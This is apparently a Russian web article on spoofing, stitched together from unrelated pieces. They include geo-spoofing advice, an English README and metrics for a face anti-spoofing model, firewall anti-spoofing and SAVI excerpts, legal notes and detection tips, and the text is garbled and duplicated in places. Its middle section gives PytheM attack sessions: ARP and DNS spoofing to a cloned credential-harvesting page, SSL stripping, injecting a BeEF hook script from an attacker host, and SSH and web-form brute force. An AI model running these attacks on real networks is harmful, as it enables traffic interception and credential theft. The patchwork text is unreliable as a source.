Спуфинг

Зачем вам необходимо изменять ваше местоположение

Самая важная причина, по которой вам стоит задуматься о «гео-спуфингинге» вашего местоположения, — это доступ к популярным потоковым сервисам, заблокированным в определенном месте.

Netflix невероятно популярен во всем мире, но его библиотеки в разных странах различны. Если вы хотите посмотреть шоу, доступное в их американской библиотеке, но недоступное в вашей, вам нужно будет изменить свое географическое положение, чтобы получить к ней доступ. Такие сервисы, как BBC iPlayer и YouTube, доступны только жителям соответствующих стран.

Хотя просмотр вашего любимого шоу является причиной номер один для большинства людей, это не единственная причина. Некоторые люди любят находиться в Интернете, точно зная, что «Большой брат» не будет следить за каждым их шагом.

Поисковые системы, такие как Bing и Google, отслеживают поисковую активность пользователей и сохраняют вашу историю. Это именно тот способ, как они узнают, какие типы рекламных объявлений будут лучше работать для каждого конкретного пользователя. Таргетированная реклама может быть полезна в некоторых случаях, но также может нанести вред, если она приводит к повышению цены. Вот почему гео-спуфинг может пригодиться.

Еще одна причина, по которой некоторые пользователи могут выбрать географическую подмену своего местоположения, — возможность обойти цензуру. Многие страны ограничивают контент в Интернете, например, на Ближнем Востоке, в России и Китае. Пользователи в этих странах могут выбрать гео-пуфинг, чтобы получить возможность узнать, что на самом деле происходит в Интернете и в мире вокруг них.

Introduction

model name dataset AUC EER% APCER% BPCER% ACER% MParam GFlops Link to snapshot
MN3_large CelebA-Spoof 0.998 2.26 0.69 6.92 3.8 3.02 0.15
AENET CelebA-Spoof 0.999 1.12 0.23 6.27 3.25 11.22 3.64 link to repo
MN3_large_075 CelebA-Spoof 0.997 2.79 1.21 5.44 3.32 1.86 0.1 config
MN3_small CelebA-Spoof 0.994 3.84 1.47 8.63 5.05 1.0 0.04 config
MN3_small_075 CelebA-Spoof 0.991 4.74 1.62 10.55 6.09 0.6 0.03 config
MN3_large LCC_FASD 0.921 16.13 17.26 15.4 16.33 3.02 0.15
AENET LCC_FASD 0.868 20.91 12.52 32.7 22.61 11.22 3.64 link to repo
MN3_large_075 LCC_FASD 0.892 19.42 28.34 12.18 20.26 1.86 0.1 config
MN3_small LCC_FASD 0.889 18.7 14.79 24.6 19.69 1.0 0.04 config
MN3_small_075 LCC_FASD 0.879 21.07 22.77 19.3 21.04 0.6 0.03 config

What is spoofing?

«I am serious. And don’t call me Shirley.»

Yes, it’s the famous line from the endlessly quotable 1980 film, Airplane. Films like Airplane, Spaceballs, and The Naked Gun, and songs from «Weird Al» Yankovic, and Flight of the Conchords are all spoofs. Spoofs imitate other movies, artists, and genres for comedic effect, and we love them for it. But there’s another kind of spoof, and it’s designed to hurt us, rather than entertain us.

Spoofing, as it pertains to cybersecurity, is when someone or something pretends to be something else in an attempt to gain our confidence, get access to our systems, steal data, steal money, or spread malware. Spoofing attacks come in many forms, primarily:

  • Email spoofing
  • Website and/or URL spoofing
  • Caller ID spoofing
  • Text message spoofing
  • GPS spoofing
  • Man-in-the-middle attacks
  • Extension spoofing
  • IP spoofing
  • Facial spoofing

From that malicious link, scammers will send you to a malware download or a faked login page—complete with a familiar logo and spoofed URL—for the purpose of harvesting your username and password.

Now, let’s get serious about spoofing.

“Spoofing, as it pertains to cybersecurity, is when someone or something pretends to be something else in an attempt to gain our confidence, get access to our systems, steal data, steal money, or spread malware.”

Примеры запуска PytheM

ARP спуфинг — Человек-посередине

  pythem> set interface
   Enter the interface: wlan0
  pythem> set gateway
   Enter the gateway: 192.168.1.1
  pythem> arpspoof start
   Setting the packet forwarding.
   Iptables redefined.
   ARP spoofing initialized.
  pythem> sniff
   Enter the filter: core

ARP+DNS спуф — редирект на поддельную страницу для сбора учётных данных

используйте SET или любой другой клонер сайтов по своему выбору для клонирования сайтов и размещения на apache2

  pythem> set target
   Enter the target(s): 192.168.0.8
  pythem> set interface wlan0
  pythem> set gateway 192.168.0.1
  pythem> arpspoof start
   Setting the packet forwarding.
   Iptables redefined.
   ARP spoofing initialized.
  pythem> dnsspoof start
   Type all to spoof all domains
   Domain to be spoofed: www.domainame.com
   Default address to redirect is:192.168.0.6 do you want to change?[y/n]n
   DNS spoofing initialized.
  pythem> sniff core

Человек-посередине с обходом HSTS — Очистка SSL

  pythem> set interface wlan0
  pythem> set gateway 192.168.0.1
  pythem> set target 192.168.0.8
  pythem> arpspoof start
   Setting the packet forwarding.
   Iptables redefined.
   ARP spoofing initialized.
  pythem> hstsbypass
   SSLstrip+ initialized
          |_by: LeonardoNve && M.Marlinspike
   DNS2Proxy initialized
          |_by: LeonardoNve
  pythem> sniff core

Человек-посередине с внедрением крюка BeEF

Запустите BeEF xss framework и получите url скрипта для подцепления

  pythem> set interface wlan0
  pythem> set target 192.168.1.8
  pythem> set gateway 192.168.1.1
  pythem> arpspoof start
   Iptables redefined
   Setting the packet forwarding.
   ARP spoofing initialized.
  pythem> inject start
   Enter the script source: http://192.168.1.6:3000/hook.js
   Script Injection initialized.
   Injection URL - http://192.168.1.6:80
   Script Injected on:  ('192.168.1.8', 34310)

Атака брут-форса SSH

  pythem> service ssh start
  pythem> set target 
   Enter the target(s): 127.0.0.1
  pythem> set file wordlist.txt
  pythem> brute-force ssh
   Enter the username to bruteforce: anon123

Брут-форс веб-страницы

  • Для начала получите исходный код веб-страницы и получите значение id= логина и пароля.
  • Показать результаты редиректа попытки поскольку если переходит на другую страницу, может сработало.
  pythem> set target http://127.0.0.1/
  pythem> set file
   Enter the path to the file: wordlist.txt
  pythem> brute-force webform
   Brute-Form authentication initialized.

   Enter the input id of the username box: vSIS_ID
   Enter the input id of the password box: vSIS_PASS
   Enter the username to brute-force the formulary: root

Бустер контента URL

  pythem> set target
   Enter the target(s): http://testphp.vulnweb.com/index.php?id=
  pythem> set file 1to100.txt
  pythem> brute-force url
   Content URL bruter initialized.

Блокировка DNS запросов диапазона/IP адреса локальной сети

Может быть полезным блокировать DNS, чтобы вынудить администратора подключения зайти на HTTP сервер роутера со своими учётными данными, для проверки, что происходит.

pythem> set interface wlan0
pythem> set gateway 192.168.1.1
pythem> arpspoof start
 Iptables redefined
 Setting the packet forwarding.
 ARP spoofing initialized.
pythem> dos dnsdrop
 Man-in-the-middle DNS drop initialized.
pythem> sniff core

Перенаправление всех возможных DNS запросов на хост

Подсказка: запустите apache2 или любой другой веб-сервер с заранее подготовленной HTML-страницей.

pythem> set interface wlan0
pythem> set gateway 10.0.0.1
pythem> arpspoof start
 Iptables redefined
 Setting the packet forwarding.
 ARP spoofing initialized.
pythem> dnsspoof start
 Type all to spoof all domains
 Domain to be spoofed: all
 Default address to redirect is:10.0.0.3 do you want to change?[y/n]n
 DNS spoofing initialized

Setup

  1. Create a virtual environment:
bash init_venv.sh
  1. Activate the virtual environment:
. venv/bin/activate

Data Preparation

For training or evaluating on the CelebA Spoof dataset you need to download the dataset (you can do it from the official repository) and then run the following script being located in the root folder of the project:

cd /data_preparation/
python prepare_celeba_json.py
python prepare_LCC_FASD.py --fd_model <path to `.xml` face detector model> --root_dir <path to root dir of LCC_FASD>

This script will cut faces tighter than it is in the original dataset and get rid of some garbage crops. For running this script you need to activate OpenVINO environment. Refer to the official documentation.

You can use the LCC FASD without doing this at all, but it seems to enhance performance, so I recommend doing this.
Note that the new folder will be created and named as . So to train or test the model with cropped data, please, set path to that new folder, which will be located in the same directory as the script.

To train on or evaluate the CASIA CEFA you just need to download it. The reader for this dataset supports not only RGB modality but the depth and IR too. Nevertheless, it’s not the purpose of this project.

If you want to use your own data, the next steps should be done:

  1. Prepare the reader for your dataset.
  2. Import reader object to datasets/database.py file. Substitute with your object in (35 line).
  3. In config, write any kwargs for train, validation, test protocol. If you do not have test data, you can just add the same parameters as for validation.
    Example:

Now you are ready to launch the training process!

Configuration file

The script for training and inference uses a configuration file. This is default one. You need to specify paths to datasets. The training pipeline supports the following methods, which you can switch on and tune hyperparameters while training:

  • dataset — this is an indicator which dataset you will be using during training. Available options are ‘celeba-spoof’, ‘LCC_FASD’, ‘Casia’, ‘multi_dataset’, ‘external’
  • multi_task_learning — specify whether or not to train with multitasking loss. It is available for the CelebA-Spoof dataset only!
  • evaluation — it is the flag to perform the assessment at the end of training and write metrics to a file
  • test_dataset — this is an indicator on which dataset you want to test. Options are the same as for dataset parameter
  • external — parameters for constructing external dataset reader. See Data Preparation section.
  • img_norm_cfg — parameters for data normalization
  • scheduler — scheduler for dropping learning rate
  • data.sampler — if it is true, then will be generated weights for object to uniform distribution of two classes
  • resize — resize of the image
  • checkpoint — the name of the checkpoint to save and the path to the experiment folder where checkpoint, tensorboard logs and eval metrics will be kept
  • loss.amsoftmax.ratioa — there is availability to use different m for different classes. The ratio is the weights on which provided will be divided for a specific class. For example ratio = means that m for the first class will equal to m, but for the second will equal to m/2
  • loss.amsoftmax.gamma — if this constant differs from 0 then the focal loss will be switched on with the corresponding gamma
  • For soft triple loss: — number of classes, — number of proxies for each class, — parameter for regularisation number of proxies
  • aug — advanced augmentation, appropriate value for type is ‘cutmix’ or ‘mixup. lambda = BetaDistribution(alpha, beta), cutmix_prob — probability of applying cutmix on image.
  • curves — you can specify the name of the curves, then set option to when evaluating with eval_protocol.py script
  • dropout — and dropouts are available with respective parameters
  • data_parallel — you can train your network on several GPU
  • RSC — representation self-challenging, applied before global average pooling. p, b — quantile and probability applying it on an image in the current batch
  • conv_cd — this is the option to switch on central difference convolutions instead of vanilla one changing the value of theta from 0
  • test_steps — if you set this parameter for some int number, the algorithm will execute that many iterations for one epoch and stop. This will help you to test all processes (train, val, test)

Convert a PyTorch Model to the OpenVINO™ Format

To convert the obtained model, run the following command:

python convert_model.py --config <path to config>; --model_path <path to where save the model>;

By default, the output model path is ‘MobileNetv3.onnx’

Now you obtain ‘.onnx’ format. Then go to <OPENVINO_INSTALL_DIR>/deployment_tools/model_optimizer/install_prerequisites directory and run:

install_prerequisites_onnx.sh

Use the script from the <INSTALL_DIR>/deployment_tools/model_optimizer directory to run the Model Optimizer:

python mo_onnx.py --input_model <INPUT_MODEL.onnx> --mean_values  --scale_values  --reverse_input_channels

Note, that parameters of the mean and scale values should be in the range (byte format)
To check that there are no mistakes with the conversion you can launch by writing the following command:

python conversion_checker.py --config <path to config>; --spf_model_torch <path to torch model> --spf_model_openvino <path to OpenVINO model>;

You will see the mean difference (L1 metric distance) on the first and second predicted class. If it’s 10e-6 or less then it’s all good.

Как защититься от спуфинга, защита от спуфинга почты

Наверняка многие из пользователей используют для работы в Интернете электронную почту. Ее можно защитить от спуфинга. Есть несколько безопасных вариантов:

  • не переходите по неизвестным ссылкам и не вводите свои данные на непроверенных сайтах в Интернете;
  • проверяйте адреса сайтов при вводе информации (они должны быть официальными);
  • установите на компьютер хороший антивирус, который точно защитит вашу электронную почту от спуфинга.

Например, для защиты от спуфинга часто используют бесплатный антивирус Аваст, который можно скачать отсюда – «avast.ru/index#pc» или 360 Total Security. Антивирус Касперского тоже хорошо справляется со своей работой. Кстати, можете посмотреть статью, где показаны лучшие антивирусы.

Старайтесь использовать Интернет в безопасном режиме. Не переходите на сомнительные сайты по электронной почте, которые доступны с http протоколом, они должны быть с https. Тогда ваши данные в Интернете будут находится в безопасности от посторонних глаз.

GPS-спуфинг за 90 секунд

Когда мы стали узнавать о том, как использовать подмену GPS на смартфоне, мы ожидали, что данный процесс будет технически сложным и трудновыполнимым. Мы считали, что:

  • наши Android телефоны должны иметь “рут”
  • с приложениями, которые осуществляют подмену GPS, будут проблемы (мы ожидали низкого качества данных приложений)
  • безусловно, нас забанят или мы получим soft-бан на несколько часов

Поразительно, но ни одна из этих проблем нас не коснулась!

У нас заняло около 90 секунд, чтобы установить приложение подмены GPS на Android и начать его использовать:

  • приложения, которые позволяют использовать gps-спуфинг, доступны для всех и размещены в Google Play и даже App Store
  • у нас не возникло никаких проблем в установке и работе с данными приложениями
  • ни одно из наших устройств (6 смартфонов с Android) не имело “рута”
  • по истечении 2-дней ни один из наших тестовых аккаунтов не был забанен/не получил soft-бан

Так что, все еще хуже, чем мы думали.

Как узнать, не применяют ли к вам методы спуфинга

Признаки спуфинга

Если вы подозреваете, что вас обманывают, обратите внимание на следующие индикаторы наиболее распространенных типов спуфинга:

Обратите внимание на адрес отправителя: если вы не уверены, является ли полученное вами письмо законным, дважды проверьте адрес. Мошенники часто создают похожие адреса

Если это подозрительное письмо, но при этом указан точный адрес электронной почты отправителя, то отдельно свяжитесь с этим отправителем, чтобы подтвердить законность его письма.

Будьте осторожны с почтовыми вложениями: будьте осторожны, когда речь идет о вложениях в электронное письмо от неизвестного отправителя или даже от известного отправителя в том случае, если их содержимое выглядит подозрительным. Если вы сомневаетесь, не открывайте такие вложения, так как они могут содержать вирусы и другие вредоносные программы.

Обратите внимание на плохую грамматику: если письмо содержит необычные грамматические ошибки и опечатки, оно может быть вредоносным

Проведите небольшое исследование: найдите контактную информацию отправителя в Интернете и свяжитесь с ним напрямую, чтобы узнать, является ли письмо реальным. Кроме того, поищите содержимое письма через поисковик (например, ), если оно кажется подозрительным. Как правило, если содержание письма выглядит слишком заманчивым, чтобы быть правдой, то это может свидетельствовать о мошенническом характере письма.

Спуфинг с подменой сайта (Website Spoofing)

  • Проверьте адресную строку в вашем браузере: поддельный веб-сайт, скорее всего, не будет защищен. Чтобы проверить это, посмотрите в адресной строке на наличие буквы «s» в конце названия протокола https://. Эта буква «s» означает «безопасный», то есть сайт зашифрован и защищен от кибер-преступников. Если в названии протокола адреса сайта нет в конце буквы «s», то это не означает автоматически того, что вы находитесь на поддельном сайте, но, тем не менее, рекомендуем вам проверить дополнительные признаки.
  • Попробуйте менеджер паролей: программное обеспечение, используемое для автоматического заполнения регистрационных данных для авторизации, не работает на поддельных веб-сайтах. Если программное обеспечение автоматически не заполняет поля с паролем и именем пользователя, то такое поведение менеджера паролей может быть признаком поддельности веб-сайта.
  • Отсутствие символа с замочком: легитимные веб-сайты имеют символ замочка или зеленую полосу слева от URL-адреса веб-сайта, указывающую на безопасность данного веб-сайта.

Спуфинг с подменой номера вызывающего абонента (Caller ID Spoofing)
Вы получаете звонки с неизвестных номеров: настойчивые звонки с неизвестного номера обычно являются признаком спуфинга. В этом случае не отвечайте на такие звонки или не поднимайте трубку сразу же.
Вы получаете странные ответы: если вы получаете ответы на звонки или сообщения, которые вы никогда не делали, это может быть признаком того, что ваш номер был подделан. Например, вы можете получать текстовые сообщения от людей, которые спрашивают, кто вы, зачем вы им звонили, почему вы их беспокоите и пр.
Номер вызывающего абонента показывает номер спецслужбы (например, «911»): иногда вместо номера вызывающего абонента может показываться номер какой-либо из специальных служб (например, «911») вместо фактического, реального номера телефона вызывающей стороны

Anti-Spoofing

Spoofing refers to an attacker forging the source address of a packet to make
it look as though it comes from a higher security network. Because the rule base
looks at IP addresses, among other things, if someone could spoof the source
address of a connection, it could be used to allow a connection that would
otherwise not be allowed.

Check Point implements anti-spoofing measures by checking the source address
of every packet against a predefined view of the network layout (called the
topology). Figure 3.7 shows a case in which spoofing is happening. The BadGuy
host is attempting to send a packet to Host2 that looks as though it is from
Host1. Because the packet is being received on interface 1, but the source
address belongs to a network on interface 2, it is being spoofed.

Figure 3.7 A network
in which spoofing is happening.

To properly protect yourself against IP spoofing, you must define the
topology of your network within each gateway’s topology property. Figure
3.8 shows the topology properties of a sample enforcement point.

Figure 3.8 General
topology properties of a gateway.

Each interface and its corresponding IP address is listed in the topology.
The name of the interface must be the same as it is in the underlying OS. Using
the Get button, you can populate these entries automatically through SVN
Foundation. When clicking Get, you have the option of simply pulling down the
interface name and network information, or also calculating the per-interface
topology, which is shown in Figure
3.9.

Figure 3.9 Detailed
topology configuration of an interface.

To properly implement anti-spoofing, the enforcement point must know all the
possible addresses that can come from a particular interface. There are three
options, not including «undefined»:

  • Internal, defined by interface IP and netmask

  • Internal, defined by a specific network object

  • External

Internal topologies are used for your internal network, in which you
understand all the networks. If there are no networks beyond the locally
connected interface, you can choose to use the interface’s IP and netmask
to define the topology (such as a stub network). If there are networks beyond
the interface, such as those connected by a router or another firewall, then you
should create a group object containing all the network objects, and choose the
Specific option, selecting your group object.

An external interface includes all the networks that are not covered by the
internal interfaces. Put another way, a network is valid on an external
interface if it is not defined as part of an internal interface. Figure
3.10shows a sample network that uses the three types.

Figure 3.10 A network
making use of the three types of topology settings.

The interface on 192.168.1.0/24 has no networks attached, so it can be
defined by using the configured IP and netmask. Only packets with a source IP in
that network will be accepted on that interface. The adjacent interface has
192.168.2.0/24 connected locally, but also 192.168.3.0/24 on a locally attached
router. Thus, a group object will have to be created with the two network
objects inside of it. The remaining interface, connected to the Internet, is an
external interface, so the networks on it are irrelevant. Anything except for
192.168.1.0/24, 192.168.2.0/24, and 192.168.3.0/24 will be considered valid.

TIP

The network guys in the crowd might be thinking, Why not create a network
object of 192.168.2.0/23 to cover both networks on the second interface? You
could, but using a group allows for easier changes later when you add more
networks, and it’s clearer to those who are looking at the
configuration.

There are two more rules that might come in handy:

  • The same network can appear on multiple internal interfaces.

  • You can have multiple interfaces defined as external.

In the first case, it is possible for a network to be valid on multiple
internal interfaces, such as having multiple paths to the same destination.
However, it cannot appear to be coming from any external interfaces (by
definition of an external interface). In the second case, the same behavior of
calculating external topology applies to all externally defined
interfaces—that is, any network not included on any of the internal
interfaces is valid on all external interfaces.

4.3.4. SAVI

SAVI is the name of the IETF working group that works on Source Address Validation Improvements. For the validation of a customer’s source address, the SAVI for DHCP solution in RFC 7513 is commonly used. This version of SAVI keeps track of all the IP addresses that have been assigned to each device by snooping on the DHCPv4 and DHCPv6 message exchanges on the network switch that the customer is connected to. If a customer uses an unauthorised source address the switch will drop the packet.

Vendors often use their own terminology to describe SAVI features. On Cisco devices these features are referred to as DHCP Snooping, Source Guard and Prefix Guard.

Спуфинг и законодательство

Поскольку спуфинг является преступлением в сфере электронной и компьютерной информации, то есть сведений, находящихся на физическом носителе или данных, передаваемых по каналам телекоммуникации в форме машинного кода, который может быть прочитан с помощью компьютера, ответственность за него такая же, как и за прочие компьютерные преступления и наступает по ст. 272-274 УК РФ:

  • по ст. 272 – за неправомерный доступ;
  • по ст. 273 – за разработку, эксплуатацию и распространению вирусных программ;
  • по ст. 274 – за неправильное использование компьютеров и их систем.
ТЫ Хакер? Получи статью 272 и 183 УКРФТЫ Хакер? Получи статью 272 и 183 УКРФ

Примеры спуфинга

Примеры спуфинга могут быть разнообразны:

  • спуфинг IP. Включает в себя подмену в IP-пакете адреса отправителя на адрес хостинга, которому доверяет жертва. Делается это для обмана атакуемого компьютера, который должен принять и пропустить через себя отправленные хакером пакеты. Чаще всего к IP-спуфингу прибегают при DoS-атаках. Например, когда меняют свой IP на IP жертвы, затем отсылают пакеты на сторонний сервер, который, ориентируясь на изменённый IP, начинает жертву DoSить;
  • DNS-спуфинг. Принцип действия такой же, что и у IP- спуфинга, но используются протоколы DNS;
  • ARP-спуфинг. Основан на использовании ложных ARP-протоколов, высылаемых на компьютер жертвы. Такие протоколы абсолютно не защищены, так что проверить подлинность запросов или ответов не могут. Благодаря этому трафик можно перенаправить так, чтобы проходя от компьютера жертвы к адресату, он делал это не напрямую, а через компьютер хакера так, чтобы тот получал уходящую вместе с трафиком информацию, к примеру, о паролях, логинах, данных кредитных карт;
  • MAC-спуфинг. Основан на изменении MAC-адреса сетевого устройства для обхода списков контроля серверов и маршрутизаторов или сокрытия компьютера в сети. Очень часто к нему прибегают в общественных wi-fi сетях. Цель такого спуфинга – тестирование сетей, передача вредоносных программ, сбор паролей и закрытой информации;
  • GPS-спуфинг. Цель его – обман GPS-приёмников, когда системе передаётся более мощный сигнал, нежели тот, что поступает от GPS-спутников, с целью отклонить движение по курсу в сторону. При этом злоумышленник точно должен знать, где его цель, чтобы GPS-приёмником не были заблокированы все сигналы по причине резкой смены местоположения;
  • спуфинг электронной почты. Речь идёт о подделке информации об отправителе. К данному способу обычно прибегают спамеры для сокрытия собственной электронной почты;
  • спуфинг звонящего. Цель его – предоставление абонентам ложных идентификаторов, имен и номеров, которые могут быть использованы в корыстных целях. Достигается это благодаря новым технологиям, особенно связанным с VoIP.

Использование PowerShell для управления поддельными отправителямиUse PowerShell to manage spoofed senders

Чтобы просмотреть разрешенных и заблокированных отправителей в аналитике спуфинга, используйте следующий синтаксис:To view allowed and blocked senders in spoof intelligence, use the following syntax:

В этом примере возвращаются подробные сведения обо всех отправителей, которые могут подменить пользователей в ваших доменах.This example returns detailed information about all senders that are allowed to spoof users in your domains.

Подробные сведения о синтаксисах и параметрах см. в описании Get-PhishFilterPolicy.For detailed syntax and parameter information, see Get-PhishFilterPolicy.

Чтобы настроить разрешенных и заблокированных отправителей в аналитике спуфингов, выполните следующие действия.To configure allowed and blocked senders in spoof intelligence, follow these steps:

  1. Зафиксировать текущий список обнаруженных поддельных отправителей, записав выходные данные с помощью cmdlet Get-PhishFilterPolicy в CSV-файл:Capture the current list of detected spoofed senders by writing the output of the Get-PhishFilterPolicy cmdlet to a CSV file:

  2. Используйте переменную для настройки политики аналитики спуфингов:Use the variable to configure the spoof intelligence policy:

Подробные сведения о синтаксисах и параметрах см. в описании Set-PhishFilterPolicy.For detailed syntax and parameter information, see Set-PhishFilterPolicy.

Оцените статью
Рейтинг автора
5
Материал подготовил
Илья Коршунов
Наш эксперт
Написано статей
134
Добавить комментарий